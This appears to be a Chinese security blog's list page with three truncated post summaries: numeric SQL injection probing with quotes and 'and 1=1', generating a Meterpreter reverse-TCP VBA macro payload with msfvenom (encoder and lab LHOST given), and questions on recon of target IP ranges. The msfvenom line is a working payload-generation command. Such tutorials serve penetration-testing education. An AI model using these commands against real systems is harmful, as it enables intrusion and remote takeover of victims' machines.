摘要：普通注入 数字型： 测试步骤： （1） 加单引号，URL：xxx.xxx.xxx/xxx.php?id=3'； 对应的sql：select * from table where id=3' 这时sql语句出错，程序无法正常从数据库中查询出数据，就会抛出异常； （2） 加and 1=1 ，URL：xx 阅读全文

摘要：1.生成我们的VBA代码 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.59.134 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba- 阅读全文

摘要：1.如何快速获取目标ip段？ 2.扫到的c段资产如何判断哪些是目标资产？ 3.对于ip端口泛解析的怎么探开放端口？ ... 信息收集的工具推荐 阅读全文